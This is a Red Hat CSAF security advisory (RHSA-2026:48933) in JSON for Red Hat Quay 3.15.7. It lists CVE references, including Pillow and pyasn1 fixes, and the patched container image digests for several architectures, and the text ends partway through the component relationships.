| https://nvd.nist.gov/vuln/detail/CVE-2026-59200 | external |
| https://github.com/python-pillow/Pillow/commit/f7… | external |
| https://github.com/python-pillow/Pillow/pull/9718 | external |
| https://github.com/python-pillow/Pillow/security/… | external |
| https://access.redhat.com/security/cve/CVE-2026-59204 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2500022 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-59204 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-59204 | external |
| https://github.com/python-pillow/Pillow/commit/13… | external |
| https://github.com/python-pillow/Pillow/pull/9704 | external |
| https://github.com/python-pillow/Pillow/security/… | external |
| https://access.redhat.com/security/cve/CVE-2026-59205 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2500052 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-59205 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-59205 | external |
| https://github.com/python-pillow/Pillow/commit/a9… | external |
| https://github.com/python-pillow/Pillow/pull/9715 | external |
| https://github.com/python-pillow/Pillow/security/… | external |
| https://access.redhat.com/security/cve/CVE-2026-59885 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2500380 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-59885 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-59885 | external |
| https://github.com/pyasn1/pyasn1/commit/45bdb19eb… | external |
| https://github.com/pyasn1/pyasn1/releases/tag/v0.6.4 | external |
| https://github.com/pyasn1/pyasn1/security/advisor… | external |
| https://access.redhat.com/security/cve/CVE-2026-59886 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2500041 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-59886 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-59886 | external |
| https://github.com/pyasn1/pyasn1/commit/e60c691cb… | external |
| https://github.com/pyasn1/pyasn1/security/advisor… | external |
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat Quay 3.15.7 is now available with bug fixes.",
"title": "Topic"
},
{
"category": "general",
"text": "Quay 3.15.7",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:48933",
"url": "https://access.redhat.com/errata/RHSA-2026:48933"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-13149",
"url": "https://access.redhat.com/security/cve/CVE-2026-13149"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-45822",
"url": "https://access.redhat.com/security/cve/CVE-2026-45822"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-54058",
"url": "https://access.redhat.com/security/cve/CVE-2026-54058"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-54060",
"url": "https://access.redhat.com/security/cve/CVE-2026-54060"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-55379",
"url": "https://access.redhat.com/security/cve/CVE-2026-55379"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-55380",
"url": "https://access.redhat.com/security/cve/CVE-2026-55380"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-59197",
"url": "https://access.redhat.com/security/cve/CVE-2026-59197"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-59199",
"url": "https://access.redhat.com/security/cve/CVE-2026-59199"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-59200",
"url": "https://access.redhat.com/security/cve/CVE-2026-59200"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-59204",
"url": "https://access.redhat.com/security/cve/CVE-2026-59204"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-59205",
"url": "https://access.redhat.com/security/cve/CVE-2026-59205"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-59885",
"url": "https://access.redhat.com/security/cve/CVE-2026-59885"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-59886",
"url": "https://access.redhat.com/security/cve/CVE-2026-59886"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_48933.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Quay 3.15.7",
"tracking": {
"current_release_date": "2026-08-05T04:58:19+00:00",
"generator": {
"date": "2026-08-05T04:58:19+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "5.3.8"
}
},
"id": "RHSA-2026:48933",
"initial_release_date": "2026-07-30T20:01:08+00:00",
"revision_history": [
{
"date": "2026-07-30T20:01:08+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-08-01T08:08:43+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-08-05T04:58:19+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Quay 3.15",
"product": {
"name": "Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:quay:3.15::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat Quay"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"product_id": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-container-security-operator-bundle@sha256%3A7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-container-security-operator-bundle\u0026tag=1785177654"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-container-security-operator-rhel8@sha256%3A9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-container-security-operator-rhel8\u0026tag=1785176954"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"product_id": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-bundle@sha256%3A33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-bridge-operator-bundle\u0026tag=1785274696"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-rhel8@sha256%3Aa909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-bridge-operator-rhel8\u0026tag=1785177338"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"product_id": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-qemu-rhcos-rhel8@sha256%3A2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8\u0026tag=1785178509"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"product_id": "registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-rhel8@sha256%3A4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-builder-rhel8\u0026tag=1785180550"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"product": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"product_id": "registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/clair-rhel8@sha256%3Af62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4?arch=amd64\u0026repository_url=registry.redhat.io/quay/clair-rhel8\u0026tag=1785177181"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"product_id": "registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-bundle@sha256%3Ac9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-operator-bundle\u0026tag=1785322285"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64",
"product_id": "registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-rhel8@sha256%3Ae07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-operator-rhel8\u0026tag=1785177009"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"product_id": "registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-rhel8@sha256%3A3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-rhel8\u0026tag=1785261506"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-container-security-operator-rhel8@sha256%3A1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2?arch=ppc64le\u0026repository_url=registry.redhat.io/quay/quay-container-security-operator-rhel8\u0026tag=1785176954"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-rhel8@sha256%3A035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f?arch=ppc64le\u0026repository_url=registry.redhat.io/quay/quay-bridge-operator-rhel8\u0026tag=1785177338"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"product_id": "registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-rhel8@sha256%3A7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd?arch=ppc64le\u0026repository_url=registry.redhat.io/quay/quay-builder-rhel8\u0026tag=1785180550"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"product": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"product_id": "registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/clair-rhel8@sha256%3A8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b?arch=ppc64le\u0026repository_url=registry.redhat.io/quay/clair-rhel8\u0026tag=1785177181"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"product_id": "registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-rhel8@sha256%3A3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80?arch=ppc64le\u0026repository_url=registry.redhat.io/quay/quay-operator-rhel8\u0026tag=1785177009"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"product_id": "registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-rhel8@sha256%3A840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e?arch=ppc64le\u0026repository_url=registry.redhat.io/quay/quay-rhel8\u0026tag=1785261506"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-container-security-operator-rhel8@sha256%3A071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51?arch=s390x\u0026repository_url=registry.redhat.io/quay/quay-container-security-operator-rhel8\u0026tag=1785176954"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-rhel8@sha256%3Af2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce?arch=s390x\u0026repository_url=registry.redhat.io/quay/quay-bridge-operator-rhel8\u0026tag=1785177338"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"product_id": "registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-rhel8@sha256%3A981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3?arch=s390x\u0026repository_url=registry.redhat.io/quay/quay-builder-rhel8\u0026tag=1785180550"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"product": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"product_id": "registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"product_identification_helper": {
"purl": "pkg:oci/clair-rhel8@sha256%3Aa2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857?arch=s390x\u0026repository_url=registry.redhat.io/quay/clair-rhel8\u0026tag=1785177181"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"product_id": "registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-rhel8@sha256%3A8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e?arch=s390x\u0026repository_url=registry.redhat.io/quay/quay-operator-rhel8\u0026tag=1785177009"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x",
"product_id": "registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-rhel8@sha256%3Abdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6?arch=s390x\u0026repository_url=registry.redhat.io/quay/quay-rhel8\u0026tag=1785261506"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le"
},
"product_reference": "registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x"
},
"product_reference": "registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64 as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64"
},
"product_reference": "registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64 as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64 as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64 as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64 as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
